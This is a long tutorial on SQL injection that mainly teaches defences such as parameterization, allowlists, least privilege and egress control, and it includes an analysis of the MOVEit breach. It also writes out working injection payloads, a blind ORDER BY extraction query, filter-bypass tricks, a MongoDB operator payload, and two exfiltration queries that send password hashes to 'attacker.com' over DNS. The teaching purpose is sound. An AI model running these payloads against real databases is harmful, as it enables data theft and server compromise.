Application Security

SQL Injection: Beyond Parameterized Queries

Matthew Houseman June 8, 2026 73 min read

In May 2023, a SQL injection flaw in MOVEit Transfer (CVE-2023-34362), a managed file-transfer product sitting inside banks, governments, and payroll processors, was turned by the Cl0p group into one of the largest supply-chain data breaches in recent years, with downstream impact across a wide swath of organizations and the people whose data they held. The vulnerability class behind it was widely credited as first publicly documented in 1998. That distance, a quarter century between "we understand this completely" and "it still owns the enterprise," is the story of SQL injection. Everyone can recite the one-line fix. Almost nobody applies it in every place it is needed, and the gaps it leaves are where real bugs live. What follows works up from the textbook payload to the techniques that still breach the enterprise, one level at a time.

The PDF is the summary; what follows is the full treatment. Read it top to bottom, or jump to what you came to do:

Learn how it works, end to end. The climb through Levels 1 to 4: breaking a string and the fix that holds, extracting data through blind channels and fingerprinting the engine, defeating filters and charsets, and the pivot from one query to the whole machine.
Fix vulnerable code. Parameterize values and allowlist structure, then test it against the query-feature footguns and the bulk-import and cloud-warehouse surfaces where it hides.
Review a PR or audit a framework. Code review with a pattern in mind, plus the per-framework escape-hatch matrix.
Secure generated or LLM SQL. When a model writes the query.
Contain the blast radius. Least privilege, RLS, views, encryption, and egress control for when one gets through.
Prove it, and plan for failure. A verification program that shows the defense is real, and an incident plan for the day it is not.
If you read nothing else, jump to "The whole thing on one card" near the end.

What SQL injection is

SQL injection is usually taught as "the attacker put a quote in your input." That is the symptom. The cause is structural. Your application assembles a statement by concatenating a query template you wrote with data you did not, then hands the database one flat string. The parser then has to recover your intent from bytes, and it cannot, because nothing in that string marks where your trusted structure ends and the attacker's data begins. Code and data travel the same channel. Formally this is CWE-89, and it anchors the A05:2025 Injection category in the OWASP Top 10.

One flat string reaches the parser, with no boundary between the code you wrote and the data you did not.

Every member of the injection family, OS command, LDAP, XPath, ORM/HQL, template injection, is this same collapse in a different interpreter, and prompt injection (which the closing section returns to) is the same kind of trust-boundary collapse again. The mental shift that pays off: stop hunting "dangerous characters" and treat the bug as two trust domains merged into one string.

Where it hides in real apps

The login form is where SQL injection is taught, but it is far from the only place it lives. Injection follows data, and data arrives from far more places than the obvious field. Any value that reaches a query is a candidate, no matter how trustworthy it looks:

Request metadata, beyond the body: headers, cookies, and path parameters. Documented cases include injection through the Host header and even fields lifted from a client TLS certificate.
Structured bodies and APIs, JSON fields and the filter and sort grammars of GraphQL and OData resolvers, which routinely compile down to SQL. A typed GraphQL schema validates the shape of a request, not the safety of the resolver behind it: if that resolver still concatenates an argument into SQL, the endpoint is injectable like any other, and the type system has bought you nothing.
Bulk and external inputs, CSV and file imports, third-party webhooks, and SSO/SAML/OIDC profile fields (display name, group, department) that you did not author and the identity provider did not sanitize for you.
Upload and file metadata, the filename, object key, content-type, and archive entry names that ride along with an upload and then flow into queries through imports, document management, and admin search, long after the file itself was handled.
Internal and deferred paths, admin and report builders that assemble queries from user choices, background jobs that process the data hours later, and stored data reused in a new query long after it was safely inserted (the second-order case).
Generated SQL from natural language, the 2026 addition: LLM agents, analytics assistants, "ask your data" features, and text-to-SQL report builders that compose queries from untrusted instructions. It is query generation driven by attacker-influenceable input, a structural-query risk rather than just another input source, so it gets its own treatment under the footguns below.

The common thread is that none of these feel like attacker input at the point of use. A header looks like infrastructure, an SSO field looks like it came from a trusted provider, a row in your own database looks like your data. The query does not care where the bytes came from; if they were ever attacker-influenced, they still are when they reach the parser. So, no, it is not just login forms.

Level 1 · Basics

The classic case

Everything starts with a value that lands inside a quoted string and an application that builds its query by gluing that value in.

Breaking out of the string

The simplest injectable code concatenates input straight into SQL:

# the value is glued straight into the query text
cur.execute("SELECT * FROM users WHERE email = '" + email + "'")

Send ' OR '1'='1' -- - as the email and the logic flips. The leading quote closes the string, OR '1'='1' makes the WHERE clause always true, and the trailing -- - comments out the rest of the line. It is written as -- - rather than a bare -- so it still starts a comment in MySQL, which only treats -- as one when a space or control character follows. The query returns every row, which on a login form is an authentication bypass. From the same foothold, UNION SELECT grafts columns from other tables onto the results, and a verbose database error will happily print the data it choked on. And reads are only half of it: the same always-true condition dropped into an UPDATE or DELETE rewrites or erases rows in bulk, and a writable injection point can INSERT attacker-chosen data, so injection threatens integrity and availability, not just confidentiality. That is the whole of basic SQL injection: close the quote, rewrite the logic, and read or change data you were never meant to touch.

Parameterize instead of sanitizing

For most application code, the first move is to use your ORM or query builder's typed, value-binding APIs, filter(User.email == email), where({ email }), and the like, which bind the values for you. The caveat is that many of the same libraries also expose raw-string overloads, where("email = #{x}") or a raw() escape hatch, that do not bind and reopen the hole, so the rule is to stay on the typed API and treat the raw one as raw SQL. Reach for raw SQL only when you need it. The rest of this section is what "parameterize" means underneath, so that when you do touch raw SQL you know what the safe version is doing.

The fix everyone recites is correct, and the mechanism is the reason it works. The required control is a parameterized API that preserves the separation of code and data: you write the SQL with placeholders and pass the values separately, so the structure you wrote and the values you did not never share the parser's input as one string. The strongest form of that boundary is a server-side bind, the server parses the SQL with placeholders first, freezing the structure, then the values arrive as data on execute, never reaching the parser as code. Not every stack keeps a persistent server-side prepared statement, and that is fine: what matters is that the API preserves code/data separation, not that a prepared statement literally lives on the server. The failure mode to avoid is the other direction, drivers that emulate the bind client-side by interpolating and escaping before they send one string; that is acceptable only when the driver's charset and config are correct, and is best disabled where you can, because emulation drops you back onto escaping and the traps a few sections down.

# email is bound as a value, never concatenated into the SQL as code
cur.execute("SELECT * FROM users WHERE email = %s", (email,))

Structure is parsed before any value arrives, so a value can never become code.

A common point of confusion: placeholder syntax varies by driver, %s, ?, :name, or $1 depending on the database and library. The %s above is a driver bind marker, not Python % string interpolation and not an f-string, which is precisely why the value never reaches the SQL parser as code.

One thing parameterization is not: authorization. Binding tenant_id, account_id, or user_id makes the value safe from injection, but if the attacker is allowed to choose someone else's ID, you have just safely run an unauthorized query. Access control is a separate check you still owe on top of the bind.

The tempting shortcut is to clean the input by hand instead, strip the quotes and keep concatenating. It does not work, and seeing why is the first real lesson. Stripping apostrophes blocks the textbook payload, which is why it feels safe:

# "sanitized" by deleting quotes, then concatenated anyway
email = user_input.replace("'", "")
cur.execute("SELECT * FROM users WHERE email = '" + email + "'")

But plenty of injection needs no quote at all. The moment the value sits in a numeric or otherwise unquoted position, the apostrophe is irrelevant:

# id is numeric, so there is no quote to break out of
cur.execute("SELECT * FROM accounts WHERE id = " + user_input.replace("'", ""))

# attacker sends:  0 OR 1=1
# query becomes:  SELECT * FROM accounts WHERE id = 0 OR 1=1   (every row)

Sanitizing asks "does this input look dangerous?", a question with infinitely many wrong answers. Parameterization asks nothing about the input at all, which is why it works where hand-cleaning cannot.

Level 2 · Intermediate

When the response gives nothing back

Real targets rarely echo your query back, and they are rarely the database you assumed. The intermediate game is pulling data through narrow channels and fingerprinting the engine so your payloads actually fire.

Extracting data through a keyhole

What an attacker can do depends on what the application hands back. As defenders close the loud channels, attackers move to the quiet ones, so a scanner that only flags the first row below is testing the easiest sliver of the problem.

Reference SQL Injection by Channel How the class is exploited, loudest to most silent.

Channel	How it works	The tell
Error-based	Data leaks through verbose database error messages.	DB errors shown to the user
UNION-based	`UNION SELECT` grafts attacker columns onto the result set.	Extra or mismatched rows
Boolean blind	Nothing is returned, but the response differs on a true/false condition.	Same page, content varies by input
Time blind	The query pauses on a condition (`SLEEP`, `WAITFOR DELAY`).	Response latency tracks the payload
Out-of-band	The database makes an outbound DNS, HTTP, or SMB request carrying data or credentials.	Traffic from the DB to attacker infra

Fingerprinting the engine

The classes above hold everywhere, but the payloads do not. Every engine speaks a different dialect, which is why an attacker fingerprints your database before anything else: a string that works on MySQL is inert on Oracle. Knowing the differences is the line between "I think this is injectable" and a working exploit.

Reference The same attack in four dialects Why fingerprinting the database comes first.

Technique	MySQL	PostgreSQL	SQL Server	Oracle
String concat	`CONCAT(a,b)`	`a \|\| b`	`a + b`	`a \|\| b`
Comment to EOL	`--` or `#`	`--`	`--`	`--`
Time delay	`SLEEP(5)`	`pg_sleep(5)`	`WAITFOR DELAY '0:0:5'`	`DBMS_PIPE.RECEIVE_MESSAGE('x', 5)`
Stacked queries	Off by default	Simple protocol only	Yes	No
Version string	`@@version`	`version()`	`@@version`	`SELECT banner FROM v$version`
Current user	`current_user()`	`current_user`	`SYSTEM_USER`	`SELECT user FROM dual`

The row to watch is stacked queries, the ability to chain a second statement after a semicolon. Where it is allowed, classically SQL Server, an injection jumps from reading data to running INSERT, UPDATE, or system commands. But this is a property of the driver and wire protocol as much as the engine: PostgreSQL permits multiple statements over its simple query protocol yet not the extended (prepared) protocol, so a parameterized call usually cannot stack, and most MySQL drivers disable multi-statements by default. Oracle does not stack at all in ordinary SQL statement contexts, which is why Oracle injection leans on subqueries and out-of-band tricks instead, though an injectable PL/SQL block or dynamic PL/SQL is a different story and can execute several statements. Treat the column as "possible," not "guaranteed," and note the smaller detail that the MySQL -- comment needs a trailing space while # does not. Read these as the canonical form, not a guarantee that each fires anywhere: several depend on a package grant, a driver or protocol setting, or the execution context, Oracle's DBMS_PIPE.RECEIVE_MESSAGE needs EXECUTE on the package (it waits up to the given timeout and returns early if a message arrives, so a predictable delay wants an empty or unique pipe name), the file and OS primitives further down need their own privileges, and stacking depends on the multi-statement support above, so confirm the precondition before assuming a payload is callable.

SQLite belongs in the conversation even though it is not in the table: it is everywhere modern software hides, desktop and mobile apps, browser extensions, internal tools, and increasingly AI and agent integrations. Its blast radius is smaller, no server, no network, and stacking that depends entirely on the wrapper: prepared execute APIs usually reject a multi-statement string in one call, while exec and script helpers (sqlite3_exec, executescript) will happily run several statements at once. "Smaller" is not "low risk," though: depending on the wrapper and config, injection can still abuse local-file-adjacent features like ATTACH DATABASE, dangerous pragmas, and load_extension where it is enabled. Either way injection against it is real and easy to overlook, and the same parameterize-and-allowlist rules apply, plus a few SQLite-specific ones: disable extension loading, consider an authorizer callback (sqlite3_set_authorizer) to veto dangerous operations, and set trusted_schema=OFF where it is relevant.

Cover the gaps parameterization leaves

Parameterization binds values. It cannot bind structure. That single distinction accounts for most of the injection that still turns up in otherwise modern codebases.

Identifiers and syntax

You cannot bind a table name, a column name, a sort direction, or a keyword. So every dynamic feature, sort by a user-chosen column, choose which columns to return, a configurable table, falls back to concatenation. ORDER BY " + column is the canonical case and it is everywhere. The only safe handling is an allowlist: map the user's input to a fixed, hardcoded set of permitted identifiers and reject anything else. The rule is never accept a raw user-chosen identifier and never rely on escaping alone to make one safe; allowlist first, then quote the trusted identifier the allowlist returns. Identifier-quoting helpers (quote_ident, QUOTENAME, an ORM's identifier escaper) exist for trusted or generated names, schema introspected at startup, not for accepting an arbitrary user-chosen table or column. Quoting is also not authorization: quote_ident only stops a name from breaking the SQL syntax, so a safely-quoted pg_shadow or a secrets table is still the wrong table, returned cleanly. The allowlist closes both holes at once, the broken query and the unauthorized one, because it also decides which names are permitted in the first place. Some dialects do expose identifier-specific APIs, such as Databricks's IDENTIFIER() clause, that accept a parameter marker in a name position; treat that as a convenience, not a loophole, and still feed it only allowlisted, authorization-checked names, since binding a name does not make an arbitrary user-chosen one safe.

A sortable identifier is also not a minor bug: a raw sort expression can become a blind extraction channel. In a vulnerable context, an attacker who controls the ORDER BY expression can read data one character at a time by sorting on a condition, even on an endpoint that never prints the value:
```
ORDER BY (CASE WHEN (SELECT substring(password,1,1)
                       FROM users WHERE is_admin LIMIT 1)='a'
               THEN id ELSE -id END)
```
If the rows come back in ascending id order, the first character is a; if the order is reversed, it is not. Walk the positions and the alphabet and the whole secret falls out. The exact syntax is dialect-adjusted in practice, substring, the single-row limit, and the sort expression all vary by engine, but the technique applies broadly across engines given a controllable expression and observable ordering. That is why the control is an allowlist, never escaping and never hoping the column is harmless.
Dynamic IN lists

WHERE id IN (?) does not expand a list in most drivers, so people concatenate it and reopen the hole. Generate one placeholder per element and bind each value, or use a real array binding where the driver offers one: PostgreSQL's = ANY($1::int[]), SQL Server table-valued parameters, or your ORM's expanding-bind helper. Handle the empty list explicitly, since IN () is a syntax error in most engines, so an empty filter has to short-circuit rather than build a broken or accidentally concatenated query. Be deliberate about what "empty" means, too: "no filter supplied" and "a filter supplied with zero matching IDs" are different intents. For a WHERE id IN (selected_ids) filter, an empty selection should usually become WHERE false and return no rows, not silently drop the clause and widen access to everything. Cap the list length, too: even a safely bound list of thousands of placeholders becomes an availability problem and can hit driver or statement limits, so for large sets reach for a temp table, table-valued parameters, bulk-loaded IDs, or a server-side join instead. The temp-table option is for trusted, application-built queries, not for generated or user-authored SQL, where temporary objects are a side-effect surface to block rather than a tool to reach for (more on that under generated SQL).
```
# empty filter must match nothing, not drop the clause
if not ids:
    return []
# one placeholder per element, then bind each value
placeholders = ", ".join(["%s"] * len(ids))
cur.execute(f"SELECT * FROM orders WHERE id IN ({placeholders})", ids)

# or bind the whole array on PostgreSQL, no placeholder math
cur.execute("SELECT * FROM orders WHERE id = ANY(%s::int[])", (ids,))
```

Second-order injection

Input that was safely parameterized on the way in is still untrusted on the way out. Store x' OR '1'='1 cleanly, then later build a query by concatenating that stored value, and you are injected. Your insert was fine; your read was not. Taint does not expire because data sat in a table.

# write path is parameterized and fine; name = "x' OR '1'='1"
cur.execute("INSERT INTO users (name) VALUES (%s)", (name,))

# later, a different path reuses the stored value by concatenation
row = get_user(uid)
cur.execute("SELECT * FROM logs WHERE who = '" + row["name"] + "'")   # injected on read

# fix: stored data is still input, so bind it again on the way out
cur.execute("SELECT * FROM logs WHERE who = %s", (row["name"],))

Stored procedures and ORMs are not magic

"Use stored procedures" only helps if the procedure uses static or properly parameterized dynamic SQL; a proc that runs EXEC('SELECT ... ' + @input) is just as vulnerable. The fix is the same inside a procedure as outside it, bind the values: sp_executesql with parameters on SQL Server, EXECUTE ... USING in PostgreSQL PL/pgSQL, EXECUTE IMMEDIATE ... USING in Oracle. Where the dynamic part is an object name rather than a value, allowlist it and apply the engine's safe identifier formatting (quote_ident, QUOTENAME, format('%I', ...)); never splice a caller-controlled name in raw. ORMs are safer by default but ship escape hatches that bypass their own protection: string-built Hibernate/JPA HQL, Django .extra() / .raw(), Rails where("... #{x}"), Sequelize literal(), Knex whereRaw, Prisma $queryRawUnsafe (this is an illustrative sample, not the full list, the framework matrix later carries the fuller reference for the stacks covered). Each is a concatenation point in an ORM's clothing, and they cluster in the features, search, reporting, dynamic filters, where identifier binding already failed. There is a second, sharper risk with procedures: their execution context. SQL Server EXECUTE AS, Oracle definer-rights packages, PostgreSQL SECURITY DEFINER, and ownership chaining all let a proc run with privileges the caller does not have, so a vulnerable one becomes privilege escalation even when the app role itself is tightly constrained. A constrained app role does not contain an injectable definer-rights proc; that has to be audited on its own.
```
-- vulnerable: dynamic SQL concatenated inside the proc
EXEC('SELECT * FROM users WHERE name = ''' + @name + '''');

-- safe: parameterize the dynamic SQL
EXEC sp_executesql
  N'SELECT * FROM users WHERE name = @name',
  N'@name nvarchar(100)', @name = @name;
```

Here is the allowlist pattern in practice, for the sort case that parameterization can't reach:

SORT = {"date": "created_at", "name": "last_name"}        # fixed allowlist
DIR  = {"asc": "ASC", "desc": "DESC"}                     # direction is allowlisted too

col = SORT.get(request.args.get("sort"))
direction = DIR.get(request.args.get("dir"))
if col is None or direction is None:                      # unknown input is rejected, not defaulted
    raise BadRequest("invalid sort")

query = f"SELECT ... ORDER BY {col} {direction}"          # tokens are not attacker-controlled

Level 3 · Advanced

Defeating the defenses

Now the target has parameterized the easy paths and bolted a WAF in front. Advanced work lives in the layers underneath: the filter, the character set, and the databases that aren't SQL at all.

Beating filters and WAFs

Every blocklist invites a bypass, and SQL's flexibility makes them cheap. Attackers vary case (SeLeCt), swap whitespace for inline comments or exotic bytes (UNION/**/SELECT, %09, %0a, parentheses), and on MySQL-family servers (MySQL and MariaDB) use executable comments that the engine runs but a naive filter skips (/*!50000 UNION */), encode the payload one or more layers deep with URL, double-URL, and unicode encoding, and hide the string literals a filter watches for behind hex literals like 0x61646d696e (the bytes of admin) or CHAR()/CHR() concatenation. Those last two encode string data, not grammar: they obscure a value or feed a later dynamic-evaluation step, and do not turn a 0x... literal into a SQL keyword in an ordinary statement. The logic is just as fluid: OR 1=1 becomes OR 2>1, OR 'a'='a', or, in MySQL SQL modes where || is logical OR rather than string concatenation, || 1=1. None of this is manual labor: sqlmap's --tamper scripts apply these transforms automatically, swapping spaces for inline comments (SELECT/**/password), randomizing case, and URL- or hex-encoding the payload, so a static regex blocklist is frequently bypassed on the first automated pass.

Anything that tries to recognize malicious SQL in a string is playing a game it eventually loses.

The deeper reason WAFs fail is a parser differential. The WAF and the database do not parse SQL the same way: the WAF normalizes input and matches it against its own approximation of the grammar, while the database has the real one. Any construct the two interpret differently, a comment style the WAF strips but the engine honors, an encoding the engine decodes but the WAF does not, a multibyte sequence they disagree on, is a bypass waiting to be found, and that gap never fully closes. The differential does not stop at SQL parsing; it starts at request parsing. Duplicate parameters, mixed JSON and form bodies, content-type confusion, proxy normalization, and a framework's parameter-precedence rules can all mean the value the WAF inspected is not the value that reaches the query. If the WAF and the app disagree on which copy of a parameter wins, the inspected one can be harmless while the live one is not.

Encoding and charset tricks

Escaping is not even a fixed operation; whether it neutralizes a quote depends on the character set. (And if your "prepared" statements are actually emulated client-side, common with PHP PDO's ATTR_EMULATE_PREPARES = true on MySQL, you are back on escaping entirely, with everything below in play.)

Multibyte charsets defeat byte-wise escaping. In encodings like GBK, Big5, or Shift-JIS, some lead bytes combine with the following byte to form one character. A charset-naive escaper that inserts 0x5c (\) before a quote can be tricked: send 0xbf 0x27, the escaper produces 0xbf 0x5c 0x27, and because 0xbf5c is a single valid GBK character, the backslash is swallowed as its trailing byte, leaving the 0x27 (') live. UTF-8 is immune to this specific trick, since its continuation bytes never include 0x5c, which is one more reason utf8mb4 should be the default everywhere. It does not make escaping safe in general, though, it just closes this one multibyte hole; parameterization is still the control.

Setting the charset with a query is not enough. mysql_real_escape_string() escapes according to the charset the client library believes is active. Running SET NAMES gbk as a query changes the server's view but not the client's, so the escaper keeps treating input as single-byte and stays vulnerable. The charset has to be set through the driver/API: mysql_set_character_set() in the MySQL C API, mysqli::set_charset() / mysqli_set_charset() in PHP MySQLi, or a PDO DSN charset=. The legacy PHP mysql_set_charset() belonged to the mysql_* extension that was removed in PHP 7.0, so it should not be used in new code. A great deal of "we escape and we set the charset" code was exploitable for exactly this reason. Set it when the connection is created, not after: a query that escapes input can run before a later charset call, and some drivers will not retroactively update their client-side state.

A character can change after you validate it. Charset conversions are not always faithful. Windows "best-fit" mapping, for one, transcodes certain non-ASCII characters to the nearest ASCII look-alike: a fullwidth or modifier apostrophe that sailed through validation and escaping can be converted into a plain 0x27 quote by a downstream code-page conversion, arriving at the database as a live quote you never inspected.

The NoSQL cousin

The boundary failure is not unique to SQL; it surfaces wherever untrusted input reaches a query interpreter, just with different grammar. MongoDB is the common case. An application that trusts a JSON body and passes it straight into a query lets an attacker substitute operators for values: send {"user":"admin","pass":{"$ne":null}} and for any account whose stored password exists and is non-null the check collapses to pass != null, matching without ever knowing the password. Stored passwords are normally non-null, so this walks past the login even though it is not a literal always-true predicate. The sharper edge is the JavaScript sinks, $where, legacy mapReduce, and the aggregation $function, which evaluate server-side JavaScript: where they are reachable, an attacker may be able to run logic inside MongoDB's JavaScript environment, bypass predicates, leak the data that code can reach, or force denial-of-service behavior, rather than just disclosing a single record. Where server-side JavaScript is enabled these remain dangerous; MongoDB deprecated the mapReduce command in 5.0, then deprecated the server-side JavaScript operators ($where, $function, $accumulator) in 8.0, logging a warning when they run, but older deployments still expose them. This is not the same as arbitrary shell execution or unrestricted database access, since the JavaScript runtime is sandboxed and constrained and scripting can be disabled outright, but it is well beyond a single leaked row.

The defenses mirror the SQL ones: pass scalar values into queries rather than raw request objects, validate the shape of anything you do accept and reject unexpected operator keys like $ne or $where, enforce a schema, and avoid the server-side JavaScript operators entirely. Crucially, that validation has to be recursive: checking only the top level misses operators smuggled into nested objects, array elements, dotted keys, or update operators. Validate the whole object shape against a schema and extract scalars explicitly, rather than trusting that a clean first level means a clean payload. And the filter is only the start: the same structural problem reaches update documents, projections, sort objects, and aggregation pipelines, all of which are attacker-shaped objects too. The defensive pattern is not "block $ne," it is to build each of those, the $set document, the projection, the sort, the pipeline stages, from route-specific allowlists, exactly as you allowlist structure in SQL.

// vulnerable: the raw request body becomes the query filter
db.users.findOne(req.body)            // {"user":"admin","pass":{"$ne":null}}

// safe from operator injection: validate types first and reject non-scalars, so an
// object or array can never slip in as an operator. Then look the account up by username
// and verify the password against a stored hash in the app, never by comparing a
// plaintext password inside the query
const { user, pass } = req.body;
if (typeof user !== "string" || typeof pass !== "string") {
  throw new Error("user and pass must be strings");
}
const account = await db.users.findOne({ user });
const ok = account && await argon2.verify(account.passwordHash, pass);

Fix it in the configuration

Server modes change the rules of escaping. MySQL's NO_BACKSLASH_ESCAPES makes \ a literal, so quotes must be escaped by doubling instead, and escaping code that assumes backslashes is then wrong. PostgreSQL has the same story with standard_conforming_strings (off in old versions, on by default since 9.1). ANSI_QUOTES turns " into an identifier quote. Escaping correctness is a function of configuration you may not control; parameterization removes the question.

So the advanced defenses are configuration, not cleverness: default to utf8mb4 and set the connection charset through the driver rather than a stray SET NAMES, normalize input to one encoding early (before you validate), prefer real server-side prepares over emulation, and validate types as a fail-safe (an id is a positive integer; a password is a string, not an object). Run the server in strict mode while you are at it: with strict mode off, MySQL can truncate an over-length value to fit its column and emit a warning rather than rejecting the row, which is not injection but can contribute to logic or authentication bypasses under weak schema and lookup assumptions (a registration that truncates down to collide with an existing admin row where no effective unique constraint rejects it). Applications that ignore the warning then behave as if validation and storage agreed when they did not, so reject over-length input rather than letting the database quietly reshape it. Add resource limits to cap the cost of an attack you don't block outright. Two kinds matter. Cost limits blunt extraction and denial of service: a per-user or per-role statement timeout, a hard row or output cap on report and search endpoints, and an engine-specific governor (SQL Server Resource Governor, query cancellation, a max execution time) so a single greedy or time-based query cannot run away with the database. Bound memory and temp space as well as time, since an injected query can exhaust sort or hash memory and spill to disk without ever running long: cap temp-file size, set per-query or per-workload memory limits, and cap result and response body size. Transaction limits stop a secondary outage: read-only transactions on read paths, an idle_in_transaction_session_timeout where available, and lock timeouts, so an injected query cannot park itself holding locks. Cap concurrency too, beyond individual queries: per-role connection limits and a bounded pool, so injection cannot turn into an availability incident by spawning many slow queries or exhausting the connection pool even when each query has its own timeout. The WAF stays, as detection and a speed bump, never as the control standing between you and a breach.

Level 4 · Full Compromise

From one injection to the whole machine

Everything so far reads or alters data. The top of the ladder is when a single injection becomes the server itself, and when it happens to thousands of servers at once.

From query to shell

The settings that decide blast radius are what turn a SELECT into a foothold. Where multi-statements are allowed, an injection appends its own statement and pivots from read to write. With the right privileges, MySQL's INTO OUTFILE writes a web shell to disk where secure_file_priv permits it (the precondition the next paragraph breaks down), xp_cmdshell on SQL Server runs operating-system commands, and Oracle's UTL_HTTP reaches the network. And when nothing comes back in the response at all, out-of-band channels exfiltrate anyway: the database is coerced into a DNS or HTTP lookup whose hostname carries the stolen data. Out-of-band is more than data-in-DNS: on SQL Server and Windows, a coerced UNC path (the xp_dirtree / xp_fileexist family) makes the host reach out over SMB, which can leak or relay the service account's NetNTLM credentials to an attacker-controlled share, turning a blind injection into credential capture. Concretely, the secret becomes part of a hostname the attacker's DNS or SMB server resolves:

-- MySQL, Windows only, and only with FILE plus a secure_file_priv that permits the UNC
-- path: the value is hex-encoded (raw bytes are not hostname-safe) and rides out as the
-- hostname the attacker's DNS/SMB server logs
SELECT LOAD_FILE(CONCAT('\\\\', (SELECT HEX(password) FROM users LIMIT 1), '.attacker.com\\x'));

-- PostgreSQL (needs superuser / pg_execute_server_program): COPY pipes the value to
-- the program's stdin, which resolves it as a subdomain
COPY (SELECT encode(convert_to(password, 'UTF8'), 'hex') FROM users LIMIT 1)
  TO PROGRAM 'read x; nslookup "$x.attacker.com"';

These are deliberately simplified: a working exfiltrator also has to split the encoded value across DNS labels of at most 63 octets (a hex SHA-256 hash alone is 64), add sequence labels to reassemble it, and handle NULLs and multiple rows. The point here is only that the secret leaves in a hostname. Both need a privilege the application role has no reason to hold (FILE on MySQL, superuser or pg_execute_server_program on PostgreSQL), which is exactly why least privilege and egress control, below, are what close the channel.

Every one of those is a configuration choice, which is also where it is stopped:

Multi-statement support (allowMultiQueries=true in JDBC, the CLIENT_MULTI_STATEMENTS flag) lets an injection stack a second statement and pivot from read to write. This is a separate dial from emulated prepares: emulation is an escaping risk, while stacking depends on multi-statement capability being switched on.
secure_file_priv (MySQL) governs the directional file primitives, INTO OUTFILE writes a file, LOAD_FILE() reads one, and LOAD DATA INFILE imports one: NULL disables file import/export entirely, a directory restricts it to that path, and empty means unrestricted, the last of which lets an injection drop a web shell or read arbitrary files. LOAD DATA LOCAL INFILE is a separate, often-confused dial: it requires both the server's local_infile permission and the client library's own LOCAL capability to be enabled, and when it runs the server asks the client to send a file, so the exposure is a file on the application host, not the database server. That still matters when an injection runs through a client that permits it.
Dangerous privileges and capabilities like FILE (MySQL), xp_cmdshell and OLE automation (SQL Server), or UTL_FILE / UTL_HTTP (Oracle) turn a SELECT into the filesystem, the OS, or the network.

The dangerous dials by engine

The same capability is a different switch on each engine, and an injection's ceiling is set by which ones are left on. The containment goal is an application role that holds none of them.

Reference Escalation Dials by Engine What turns a query into a foothold, and where to turn it off.

Capability	MySQL	PostgreSQL	SQL Server	Oracle
Prepared statements	Driver-dependent; for PDO check `ATTR_EMULATE_PREPARES`	Driver/provider and config dependent	Driver/provider and config dependent	Server-side
Multi-statements	Off unless `CLIENT_MULTI_STATEMENTS`	Simple protocol only	Allowed	Not allowed
File read / write	`FILE`, `secure_file_priv` (server); `local_infile` (server) + client `LOCAL` opt-in	`COPY ... TO/FROM`, `pg_read_server_files` / `pg_write_server_files`, `pg_read_file`, `pg_ls_dir`, large-object import/export	`BULK INSERT` (read/import), OLE Automation	`UTL_FILE` directory
OS commands	UDF via written library	`COPY ... PROGRAM` (`pg_execute_server_program`), untrusted PL	`xp_cmdshell`, CLR, OLE	`DBMS_SCHEDULER`, Java
Network / out-of-band	`LOAD_FILE` UNC (Windows)	`dblink`, extensions	`OPENROWSET`, `xp_dirtree`, `xp_fileexist`, UNC paths	`UTL_HTTP`, `UTL_INADDR` (DNS); needs network ACL

The heaviest of these, CREATE EXTENSION on PostgreSQL, UNSAFE CLR assemblies and external script runtimes (the sp_execute_external_script R/Python family) alongside CLR and OLE on SQL Server, Java on Oracle, all require elevated privilege the application role should never hold. The external-script and CLR runtimes are the modern "database to code execution" family worth auditing specifically, beyond the famous xp_cmdshell. CREATE EXTENSION is the narrower case: it installs an extension whose control files, SQL, and any native library are already present on the server, so the danger is enabling an already-present untrusted or native extension that exposes OS or network features when the caller has the privilege, not uploading attacker code. It is not, by itself, an arbitrary-code primitive. One caveat on this whole table: it is weighted toward self-managed databases. Managed and cloud offerings often disable many of these OS and file primitives out of the box, which removes the easiest shell paths but not the risk, and it trades them for a cloud-era set: attached IAM and service roles, external tables and federated queries, object-storage import and export, cloud-native extensions and data-lake connectors, and managed network integrations. Those are the modern "query to the data lake or control plane" paths, and data exfiltration, privilege misuse, and access to service credentials all remain firmly in scope. Emulated prepares belong on the list too: a driver that interpolates client-side is back on escaping, with the charset traps from Level 3 in play.

Automation at scale

None of this needs a person. sqlmap and tools like it automate the whole path: they probe a parameter with boolean, error, time, UNION, and stacked-query techniques, fingerprint the engine, then enumerate schemas and dump tables with no further input. Where the database and its privileges allow, the same tool reads and writes files and drops to an OS shell. The practical consequence is that "it is buried in an obscure parameter" is not a control. If a scanner can reach the input, the chance it is found quickly is high, and obscurity in a parameter is not a control.

Anatomy of the MOVEit breach

MOVEit shows how short the distance can be between one injection and total compromise. The flaw was a SQL injection in MOVEit Transfer's web tier, reachable before authentication. That alone is serious; what made it catastrophic was how far the pivot reached. Public advisories reported that the attackers used the injection to install the LEMURLOOT web shell (human2.aspx), so the exploit chain ended with a web shell on disk, turning a data-read bug into remote code execution and persistent access, then exfiltrating data at scale and causing large-scale downstream data exposure. The chain is a checklist of missed containment: a pre-auth injection point, an application and database path that could reach the filesystem, and nothing stopping the pivot from query to shell.

Defenses in priority order

Parameterize every value, everywhere, including dynamic SQL inside stored procedures. This is the control. The rest is containment.
Allowlist identifiers and syntax for anything you must vary: table, column, sort, keyword.
Least privilege on the database account. The app should connect as a role that can do exactly what it needs and nothing more: no DDL, no xp_cmdshell or FILE privilege, scoped to its schema. Injection through a least-privileged role reads only what that role can read; through a sysadmin role it owns the host. "Only what that role can read" is still potentially catastrophic, a reporting role can see a great deal, which is why least privilege has to be paired with the views, RLS, and column minimization below rather than relied on alone.
Control egress. Out-of-band exfiltration needs the database to reach the network. Most databases never should. Block it and an entire exfil class disappears. "Egress" is more than the public Internet, though: a database or app host that does not need outbound also should not be able to reach the cloud metadata service, internal admin and control-plane APIs, backup stores, or secret managers unless a specific function requires it, those internal endpoints are exactly what an SSRF-style DB integration or a coerced request would aim at next.
Keep errors and charset clean. Don't return database errors to users; set a UTF-8 connection charset; prefer real prepares over emulation.

And instrument for the attack you cannot prevent. Automated injection is noisy in specific ways: bursts of near-identical requests against a single parameter, repeated ORDER BY and column-count probes as a tool feels out the query shape, time-based payloads that make response latency step in clean intervals (pg_sleep, SLEEP, WAITFOR), and queries that your application would never legitimately issue, catalog sweeps of information_schema, pg_catalog, sysobjects, or sqlite_master/sqlite_schema, lone UNION activity, and file or command primitives like COPY, INTO OUTFILE, and xp_cmdshell. Watch for those at the database and the application, not the WAF alone, and you catch the campaign while it is still enumerating rather than after it has exfiltrated. Detection is only as useful as the attribution attached to it, though: log the database user, the app or workflow name, the endpoint or job, the source host, the tenant, a request or correlation ID, the deploy version, and a normalized query fingerprint alongside the query. Seeing a suspicious SELECT is far less actionable when you cannot tie it back to the route, tenant, deploy, or caller that produced it.

